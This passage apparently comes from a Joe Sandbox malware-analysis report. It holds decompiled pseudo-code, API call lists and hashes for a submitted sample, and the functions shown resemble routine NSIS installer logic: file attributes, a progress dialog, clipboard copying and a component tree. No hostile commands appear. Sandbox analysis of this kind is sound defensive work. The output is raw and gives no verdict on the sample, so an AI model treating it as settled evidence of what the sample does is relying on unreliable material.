                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                                                          • Instruction ID: f93c687e1e26e3b8db63236639f9d4e14dddfc66631b4e0972b173020c912dad
                                                          • Opcode Fuzzy Hash: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                                                          • Instruction Fuzzy Hash: 8DD09E31658201EFEF098F20DD16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004057AC(CHAR* _a4) {
                                                          				signed char _t3;
                                                          				int _t5;
                                                          
                                                          				_t3 = GetFileAttributesA(_a4); // executed
                                                          				if(_t3 != 0xffffffff) {
                                                          					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                                                          					return _t5;
                                                          				}
                                                          				return _t3;
                                                          			}






                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,004055B7,?,?,?), ref: 004057B0
                                                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004057C2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                                                          • Instruction ID: 1d3fe654247a7333bacfc0572c6a5cb341717cd3e61d1346c3f88923170604c5
                                                          • Opcode Fuzzy Hash: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                                                          • Instruction Fuzzy Hash: 95C04C71818501EBD6015B24EF09C1F7F66EB50721B508B35F469E00F0C7359C66EA2A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004032AF(long _a4) {
                                                          				long _t2;
                                                          
                                                          				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
                                                          				return _t2;
                                                          			}





                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,?), ref: 004032BD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                          • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                          • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                          • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00404FDD(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                          				struct HWND__* _v8;
                                                          				long _v12;
                                                          				struct tagRECT _v28;
                                                          				void* _v36;
                                                          				signed int _v40;
                                                          				int _v44;
                                                          				int _v48;
                                                          				signed int _v52;
                                                          				int _v56;
                                                          				void* _v60;
                                                          				void* _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				long _t87;
                                                          				struct HMENU__* _t89;
                                                          				unsigned int _t92;
                                                          				int _t94;
                                                          				int _t95;
                                                          				void* _t101;
                                                          				intOrPtr _t123;
                                                          				struct HWND__* _t127;
                                                          				int _t149;
                                                          				int _t150;
                                                          				struct HWND__* _t154;
                                                          				struct HWND__* _t158;
                                                          				struct HMENU__* _t160;
                                                          				long _t162;
                                                          				void* _t163;
                                                          				short* _t164;
                                                          
                                                          				_t154 =  *0x423704;
                                                          				_t149 = 0;
                                                          				_v8 = _t154;
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 == 0x405) {
                                                          						CloseHandle(CreateThread(0, 0, E00404F71, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                          					}
                                                          					if(_a8 != 0x111) {
                                                          						L17:
                                                          						if(_a8 != 0x404) {
                                                          							L25:
                                                          							if(_a8 != 0x7b || _a12 != _t154) {
                                                          								goto L20;
                                                          							} else {
                                                          								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                          								_a8 = _t87;
                                                          								if(_t87 <= _t149) {
                                                          									L37:
                                                          									return 0;
                                                          								}
                                                          								_t89 = CreatePopupMenu();
                                                          								_push(0xffffffe1);
                                                          								_push(_t149);
                                                          								_t160 = _t89;
                                                          								AppendMenuA(_t160, _t149, 1, E00405B16(_t149, _t154, _t160));
                                                          								_t92 = _a16;
                                                          								if(_t92 != 0xffffffff) {
                                                          									_t150 = _t92;
                                                          									_t94 = _t92 >> 0x10;
                                                          								} else {
                                                          									GetWindowRect(_t154,  &_v28);
                                                          									_t150 = _v28.left;
                                                          									_t94 = _v28.top;
                                                          								}
                                                          								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                          								_t162 = 1;
                                                          								if(_t95 == 1) {
                                                          									_v60 = _t149;
                                                          									_v48 = 0x420530;
                                                          									_v44 = 0xfff;
                                                          									_a4 = _a8;
                                                          									do {
                                                          										_a4 = _a4 - 1;
                                                          										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                                          									} while (_a4 != _t149);
                                                          									OpenClipboard(_t149);
                                                          									EmptyClipboard();
                                                          									_t101 = GlobalAlloc(0x42, _t162);
                                                          									_a4 = _t101;
                                                          									_t163 = GlobalLock(_t101);
                                                          									do {
                                                          										_v48 = _t163;
                                                          										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                          										 *_t164 = 0xa0d;
                                                          										_t163 = _t164 + 2;
                                                          										_t149 = _t149 + 1;
                                                          									} while (_t149 < _a8);
                                                          									GlobalUnlock(_a4);
                                                          									SetClipboardData(1, _a4);
                                                          									CloseClipboard();
                                                          								}
                                                          								goto L37;
                                                          							}
                                                          						}
                                                          						if( *0x4236ec == _t149) {
                                                          							ShowWindow( *0x423f24, 8);
                                                          							if( *0x423fac == _t149) {
                                                          								E00404E9F( *((intOrPtr*)( *0x41fd00 + 0x34)), _t149);
                                                          							}
                                                          							E00403ECE(1);
                                                          							goto L25;
                                                          						}
                                                          						 *0x41f8f8 = 2;
                                                          						E00403ECE(0x78);
                                                          						goto L20;
                                                          					} else {
                                                          						if(_a12 != 0x403) {
                                                          							L20:
                                                          							return E00403F5C(_a8, _a12, _a16);
                                                          						}
                                                          						ShowWindow( *0x4236f0, _t149);
                                                          						ShowWindow(_t154, 8);
                                                          						E00403F2A(_t154);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_v52 = _v52 | 0xffffffff;
                                                          				_v40 = _v40 | 0xffffffff;
                                                          				_v60 = 2;
                                                          				_v56 = 0;
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t123 =  *0x423f28;
                                                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                          				 *0x4236f0 = GetDlgItem(_a4, 0x403);
                                                          				 *0x4236e8 = GetDlgItem(_a4, 0x3ee);
                                                          				_t127 = GetDlgItem(_a4, 0x3f8);
                                                          				 *0x423704 = _t127;
                                                          				_v8 = _t127;
                                                          				E00403F2A( *0x4236f0);
                                                          				 *0x4236f4 = E00404741(4);
                                                          				 *0x42370c = 0;
                                                          				GetClientRect(_v8,  &_v28);
                                                          				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                          				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                          				if(_a8 >= 0) {
                                                          					SendMessageA(_v8, 0x1001, 0, _a8);
                                                          					SendMessageA(_v8, 0x1026, 0, _a8);
                                                          				}
                                                          				if(_a12 >= _t149) {
                                                          					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                          				}
                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          				_push(0x1b);
                                                          				E00403EF5(_a4);
                                                          				if(( *0x423f30 & 0x00000003) != 0) {
                                                          					ShowWindow( *0x4236f0, _t149);
                                                          					if(( *0x423f30 & 0x00000002) != 0) {
                                                          						 *0x4236f0 = _t149;
                                                          					} else {
                                                          						ShowWindow(_v8, 8);
                                                          					}
                                                          					E00403F2A( *0x4236e8);
                                                          				}
                                                          				_t158 = GetDlgItem(_a4, 0x3ec);
                                                          				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                          				if(( *0x423f30 & 0x00000004) != 0) {
                                                          					SendMessageA(_t158, 0x409, _t149, _a12);
                                                          					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                          				}
                                                          				goto L37;
                                                          			}

































                                                          0x0040523e
                                                          0x004051f8
                                                          0x00405202
                                                          0x00000000
                                                          0x004051c9
                                                          0x004051cf
                                                          0x00405207
                                                          0x00000000
                                                          0x00405210
                                                          0x004051d8
                                                          0x004051dd
                                                          0x004051e0
                                                          0x00000000
                                                          0x004051e0
                                                          0x004051c7
                                                          0x00404ffe
                                                          0x00405002
                                                          0x0040500b
                                                          0x00405012
                                                          0x00405015
                                                          0x00405018
                                                          0x0040501b
                                                          0x0040501c
                                                          0x0040501d
                                                          0x00405036
                                                          0x00405039
                                                          0x00405043
                                                          0x00405052
                                                          0x0040505a
                                                          0x00405062
                                                          0x00405067
                                                          0x0040506a
                                                          0x00405076
                                                          0x0040507f
                                                          0x00405088
                                                          0x004050ab
                                                          0x004050b1
                                                          0x004050c2
                                                          0x004050c7
                                                          0x004050d5
                                                          0x004050e3
                                                          0x004050e3
                                                          0x004050e8
                                                          0x004050f6
                                                          0x004050f6
                                                          0x004050fb
                                                          0x004050fe
                                                          0x00405103
                                                          0x0040510f
                                                          0x00405118
                                                          0x00405125
                                                          0x00405134
                                                          0x00405127
                                                          0x0040512c
                                                          0x0040512c
                                                          0x00405140
                                                          0x00405140
                                                          0x00405154
                                                          0x0040515d
                                                          0x00405166
                                                          0x00405176
                                                          0x00405182
                                                          0x00405182
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 0040503C
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040504B
                                                          • GetClientRect.USER32 ref: 00405088
                                                          • GetSystemMetrics.USER32 ref: 00405090
                                                          • SendMessageA.USER32 ref: 004050B1
                                                          • SendMessageA.USER32 ref: 004050C2
                                                          • SendMessageA.USER32 ref: 004050D5
                                                          • SendMessageA.USER32 ref: 004050E3
                                                          • SendMessageA.USER32 ref: 004050F6
                                                          • ShowWindow.USER32(00000000,?), ref: 00405118
                                                          • ShowWindow.USER32(?,00000008), ref: 0040512C
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040514D
                                                          • SendMessageA.USER32 ref: 0040515D
                                                          • SendMessageA.USER32 ref: 00405176
                                                          • SendMessageA.USER32 ref: 00405182
                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040505A
                                                            • Part of subcall function 00403F2A: SendMessageA.USER32 ref: 00403F38
                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040519F
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004F71,00000000), ref: 004051AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 004051B4
                                                          • ShowWindow.USER32(00000000), ref: 004051D8
                                                          • ShowWindow.USER32(?,00000008), ref: 004051DD
                                                          • ShowWindow.USER32(00000008), ref: 00405224
                                                          • SendMessageA.USER32 ref: 00405256
                                                          • CreatePopupMenu.USER32 ref: 00405267
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040527C
                                                          • GetWindowRect.USER32(?,?), ref: 0040528F
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B3
                                                          • SendMessageA.USER32 ref: 004052EE
                                                          • OpenClipboard.USER32(00000000), ref: 004052FE
                                                          • EmptyClipboard.USER32 ref: 00405304
                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 0040530D
                                                          • GlobalLock.KERNEL32 ref: 00405317
                                                          • SendMessageA.USER32 ref: 0040532B
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405343
                                                          • SetClipboardData.USER32 ref: 0040534E
                                                          • CloseClipboard.USER32 ref: 00405354
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {
                                                          • API String ID: 590372296-366298937
                                                          • Opcode ID: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                                                          • Instruction ID: ce63edb53461e73d1802b3fb2e279853447b443b010abc9b5e4e8924112ec9d2
                                                          • Opcode Fuzzy Hash: b3ec08184f05c81d6d75b8571aa97232ad7eaacc78b900a8a85595b4445b9a13
                                                          • Instruction Fuzzy Hash: 0AA14A70900209BFDB219F60DD89EAE7F79FB08355F00817AFA05BA2A0C7795A41DF59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E004047EE(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct HWND__* _v12;
                                                          				signed int _v16;
                                                          				intOrPtr _v20;
                                                          				void* _v24;
                                                          				long _v28;
                                                          				int _v32;
                                                          				signed int _v40;
                                                          				int _v44;
                                                          				signed int* _v56;
                                                          				intOrPtr _v60;
                                                          				signed int _v64;
                                                          				long _v68;
                                                          				void* _v72;
                                                          				intOrPtr _v76;
                                                          				intOrPtr _v80;
                                                          				void* _v84;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				struct HWND__* _t182;
                                                          				int _t196;
                                                          				long _t202;
                                                          				signed int _t206;
                                                          				signed int _t217;
                                                          				void* _t220;
                                                          				void* _t221;
                                                          				int _t227;
                                                          				signed int _t232;
                                                          				signed int _t233;
                                                          				signed int _t240;
                                                          				struct HBITMAP__* _t250;
                                                          				void* _t252;
                                                          				intOrPtr _t258;
                                                          				char* _t268;
                                                          				signed char _t269;
                                                          				long _t274;
                                                          				int _t280;
                                                          				signed int* _t281;
                                                          				int _t282;
                                                          				long _t283;
                                                          				int _t285;
                                                          				long _t286;
                                                          				signed int _t287;
                                                          				long _t288;
                                                          				signed int _t291;
                                                          				signed int _t298;
                                                          				signed int _t300;
                                                          				signed int _t302;
                                                          				int* _t310;
                                                          				void* _t311;
                                                          				int _t315;
                                                          				int _t316;
                                                          				int _t317;
                                                          				signed int _t318;
                                                          				void* _t320;
                                                          
                                                          				_v12 = GetDlgItem(_a4, 0x3f9);
                                                          				_t182 = GetDlgItem(_a4, 0x408);
                                                          				_t280 =  *0x423f48;
                                                          				_t320 = SendMessageA;
                                                          				_v8 = _t182;
                                                          				_t315 = 0;
                                                          				_v32 = _t280;
                                                          				_v20 =  *0x423f28 + 0x94;
                                                          				if(_a8 != 0x110) {
                                                          					L23:
                                                          					if(_a8 != 0x405) {
                                                          						_t289 = _a16;
                                                          					} else {
                                                          						_a12 = _t315;
                                                          						_t289 = 1;
                                                          						_a8 = 0x40f;
                                                          						_a16 = 1;
                                                          					}
                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                          						_v16 = _t289;
                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                          							if(( *0x423f31 & 0x00000002) != 0) {
                                                          								L41:
                                                          								if(_v16 != _t315) {
                                                          									_t232 = _v16;
                                                          									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                          										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                          									}
                                                          									_t233 = _v16;
                                                          									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                          										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                          										} else {
                                                          											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L48;
                                                          							}
                                                          							if(_a8 == 0x413) {
                                                          								L33:
                                                          								_t289 = 0 | _a8 != 0x00000413;
                                                          								_t240 = E0040476E(_v8, _a8 != 0x413);
                                                          								if(_t240 >= _t315) {
                                                          									_t93 = _t280 + 8; // 0x8
                                                          									_t310 = _t240 * 0x418 + _t93;
                                                          									_t289 =  *_t310;
                                                          									if((_t289 & 0x00000010) == 0) {
                                                          										if((_t289 & 0x00000040) == 0) {
                                                          											_t298 = _t289 ^ 0x00000001;
                                                          										} else {
                                                          											_t300 = _t289 ^ 0x00000080;
                                                          											if(_t300 >= 0) {
                                                          												_t298 = _t300 & 0xfffffffe;
                                                          											} else {
                                                          												_t298 = _t300 | 0x00000001;
                                                          											}
                                                          										}
                                                          										 *_t310 = _t298;
                                                          										E0040117D(_t240);
                                                          										_t289 = 1;
                                                          										_a8 = 0x40f;
                                                          										_a12 = 1;
                                                          										_a16 =  !( *0x423f30) >> 0x00000008 & 1;
                                                          									}
                                                          								}
                                                          								goto L41;
                                                          							}
                                                          							_t289 = _a16;
                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                          								goto L41;
                                                          							}
                                                          							goto L33;
                                                          						} else {
                                                          							goto L48;
                                                          						}
                                                          					} else {
                                                          						L48:
                                                          						if(_a8 != 0x111) {
                                                          							L56:
                                                          							if(_a8 == 0x200) {
                                                          								SendMessageA(_v8, 0x200, _t315, _t315);
                                                          							}
                                                          							if(_a8 == 0x40b) {
                                                          								_t220 =  *0x42050c;
                                                          								if(_t220 != _t315) {
                                                          									ImageList_Destroy(_t220);
                                                          								}
                                                          								_t221 =  *0x420524;
                                                          								if(_t221 != _t315) {
                                                          									GlobalFree(_t221);
                                                          								}
                                                          								 *0x42050c = _t315;
                                                          								 *0x420524 = _t315;
                                                          								 *0x423f80 = _t315;
                                                          							}
                                                          							if(_a8 != 0x40f) {
                                                          								L86:
                                                          								if(_a8 == 0x420 && ( *0x423f31 & 0x00000001) != 0) {
                                                          									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                          									ShowWindow(_v8, _t316);
                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                          								}
                                                          								goto L89;
                                                          							} else {
                                                          								E004011EF(_t289, _t315, _t315);
                                                          								if(_a12 != _t315) {
                                                          									E0040140B(8);
                                                          								}
                                                          								if(_a16 == _t315) {
                                                          									L73:
                                                          									E004011EF(_t289, _t315, _t315);
                                                          									_v32 =  *0x420524;
                                                          									_t196 =  *0x423f48;
                                                          									_v60 = 0xf030;
                                                          									_v16 = _t315;
                                                          									if( *0x423f4c <= _t315) {
                                                          										L84:
                                                          										InvalidateRect(_v8, _t315, 1);
                                                          										if( *((intOrPtr*)( *0x4236fc + 0x10)) != _t315) {
                                                          											E0040468C(0x3ff, 0xfffffffb, E00404741(5));
                                                          										}
                                                          										goto L86;
                                                          									}
                                                          									_t281 = _t196 + 8;
                                                          									do {
                                                          										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                          										if(_t202 != _t315) {
                                                          											_t291 =  *_t281;
                                                          											_v68 = _t202;
                                                          											_v72 = 8;
                                                          											if((_t291 & 0x00000001) != 0) {
                                                          												_v72 = 9;
                                                          												_v56 =  &(_t281[4]);
                                                          												_t281[0] = _t281[0] & 0x000000fe;
                                                          											}
                                                          											if((_t291 & 0x00000040) == 0) {
                                                          												_t206 = (_t291 & 0x00000001) + 1;
                                                          												if((_t291 & 0x00000010) != 0) {
                                                          													_t206 = _t206 + 3;
                                                          												}
                                                          											} else {
                                                          												_t206 = 3;
                                                          											}
                                                          											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                          											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                          											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                          										}
                                                          										_v16 = _v16 + 1;
                                                          										_t281 =  &(_t281[0x106]);
                                                          									} while (_v16 <  *0x423f4c);
                                                          									goto L84;
                                                          								} else {
                                                          									_t282 = E004012E2( *0x420524);
                                                          									E00401299(_t282);
                                                          									_t217 = 0;
                                                          									_t289 = 0;
                                                          									if(_t282 <= _t315) {
                                                          										L72:
                                                          										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                          										_a16 = _t282;
                                                          										_a8 = 0x420;
                                                          										goto L73;
                                                          									} else {
                                                          										goto L69;
                                                          									}
                                                          									do {
                                                          										L69:
                                                          										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                          											_t289 = _t289 + 1;
                                                          										}
                                                          										_t217 = _t217 + 1;
                                                          									} while (_t217 < _t282);
                                                          									goto L72;
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                          							goto L89;
                                                          						} else {
                                                          							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                          							if(_t227 == 0xffffffff) {
                                                          								goto L89;
                                                          							}
                                                          							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                          							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                          								_t283 = 0x20;
                                                          							}
                                                          							E00401299(_t283);
                                                          							SendMessageA(_a4, 0x420, _t315, _t283);
                                                          							_a12 = 1;
                                                          							_a16 = _t315;
                                                          							_a8 = 0x40f;
                                                          							goto L56;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					 *0x423f80 = _a4;
                                                          					_t285 = 2;
                                                          					_v28 = 0;
                                                          					_v16 = _t285;
                                                          					 *0x420524 = GlobalAlloc(0x40,  *0x423f4c << 2);
                                                          					_t250 = LoadBitmapA( *0x423f20, 0x6e);
                                                          					 *0x420518 =  *0x420518 | 0xffffffff;
                                                          					_v24 = _t250;
                                                          					 *0x420520 = SetWindowLongA(_v8, 0xfffffffc, E00404DEF);
                                                          					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                          					 *0x42050c = _t252;
                                                          					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                          					SendMessageA(_v8, 0x1109, _t285,  *0x42050c);
                                                          					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                          						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                          					}
                                                          					DeleteObject(_v24);
                                                          					_t286 = 0;
                                                          					do {
                                                          						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                          						if(_t258 != _t315) {
                                                          							if(_t286 != 0x20) {
                                                          								_v16 = _t315;
                                                          							}
                                                          							_push(_t258);
                                                          							_push(_t315);
                                                          							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B16(_t286, _t315, _t320)), _t286);
                                                          						}
                                                          						_t286 = _t286 + 1;
                                                          					} while (_t286 < 0x21);
                                                          					_t317 = _a16;
                                                          					_t287 = _v16;
                                                          					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                          					_push(0x15);
                                                          					E00403EF5(_a4);
                                                          					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                          					_push(0x16);
                                                          					E00403EF5(_a4);
                                                          					_t318 = 0;
                                                          					_t288 = 0;
                                                          					if( *0x423f4c <= 0) {
                                                          						L19:
                                                          						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                          						goto L20;
                                                          					} else {
                                                          						_t311 = _v32 + 8;
                                                          						_v24 = _t311;
                                                          						do {
                                                          							_t268 = _t311 + 0x10;
                                                          							if( *_t268 != 0) {
                                                          								_v60 = _t268;
                                                          								_t269 =  *_t311;
                                                          								_t302 = 0x20;
                                                          								_v84 = _t288;
                                                          								_v80 = 0xffff0002;
                                                          								_v76 = 0xd;
                                                          								_v64 = _t302;
                                                          								_v40 = _t318;
                                                          								_v68 = _t269 & _t302;
                                                          								if((_t269 & 0x00000002) == 0) {
                                                          									if((_t269 & 0x00000004) == 0) {
                                                          										 *( *0x420524 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                          									} else {
                                                          										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                          									}
                                                          								} else {
                                                          									_v76 = 0x4d;
                                                          									_v44 = 1;
                                                          									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                          									_v28 = 1;
                                                          									 *( *0x420524 + _t318 * 4) = _t274;
                                                          									_t288 =  *( *0x420524 + _t318 * 4);
                                                          								}
                                                          							}
                                                          							_t318 = _t318 + 1;
                                                          							_t311 = _v24 + 0x418;
                                                          							_v24 = _t311;
                                                          						} while (_t318 <  *0x423f4c);
                                                          						if(_v28 != 0) {
                                                          							L20:
                                                          							if(_v16 != 0) {
                                                          								E00403F2A(_v8);
                                                          								_t280 = _v32;
                                                          								_t315 = 0;
                                                          								goto L23;
                                                          							} else {
                                                          								ShowWindow(_v12, 5);
                                                          								E00403F2A(_v12);
                                                          								L89:
                                                          								return E00403F5C(_a8, _a12, _a16);
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404805
                                                          • GetDlgItem.USER32(?,00000408), ref: 00404812
